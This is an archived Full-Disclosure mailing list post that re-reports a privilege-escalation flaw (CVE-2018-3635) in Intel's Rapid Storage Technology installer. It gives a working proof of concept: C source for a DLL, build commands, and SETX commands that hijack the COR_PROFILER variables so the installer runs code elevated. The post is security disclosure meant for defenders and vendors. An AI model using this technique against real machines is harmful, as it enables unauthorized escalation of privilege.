lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4408CBF74C73423DA378721120146045@H270> Date: Tue, 23 Mar 2021 19:31:53 +0100 From: "Stefan Kanthak" <stefan.kanthak@...go.de> To: <fulldisclosure@...lists.org> Cc: bugtraq@...urityfocus.com Subject: [FD] CVE-2018-3635 revisited: executable installers are vulnerable^WEVIL (case 60): again arbitrary code execution WITH escalation of privilege via Intel Rapid Storage Technology User Interface and Driver Hi @ll, more than 2 years ago I disclosed 2 vulnerabilities leading to local escalation of privilege in the IntelĀ® Rapid Storage Technology (IntelĀ® RST) User Interface and Driver: see <https://seclists.org/fulldisclosure/2018/Nov/45> and <https://seclists.org/fulldisclosure/2018/Nov/52> Intel fixed this vulnerability only in their executable installer. Some time later Intel rewrote or rebuilt this installer (see <https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memor y> for its current version 18.0.1.1138, published 10/15/2020) and incorporated the second vulnerability. CVSS 3.0 score: 8.2 High CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Demonstration: ~~~~~~~~~~~~~~ 0. Save the following source as sentinel.c in an arbitrary directory: --- sentinel.c --- // Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@...go.de> #define STRICT #define UNICODE #define WIN32_LEAN_AND_MEAN #include <windows.h> const STARTUPINFO si = {sizeof(si)}; __declspec(safebuffers) BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext) { WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL"; PROCESS_INFORMATION pi; if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } return TRUE; } --- EOF --- 1. Start the command prompt of the 32-bit Windows Software Development Kit, then run the following command lines to compile sentinel.c and link it as sentinel.dll: cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj kernel32.lib ALTERNATIVE for steps 0 and 1: 1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and save it in an arbitrary directory. 2. Logon with the user account created during Windows setup. 3. Start a command prompt (unelevated!) and run the following command lines (replace <directory> with the pathname of the directory where you built or saved sentinel.dll): SETX.exe COR_ENABLE_PROFILING 1 SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A} SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll JFTR: this is just one method to set these environment variables without the need to elevate! 4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and save it in an arbitrary directory. 5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then admire the console windows showing the output of WHOAMI.exe running elevated. stay tuned, and FAR AWAY from vulnerable crap built by Intel Stefan Kanthak _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists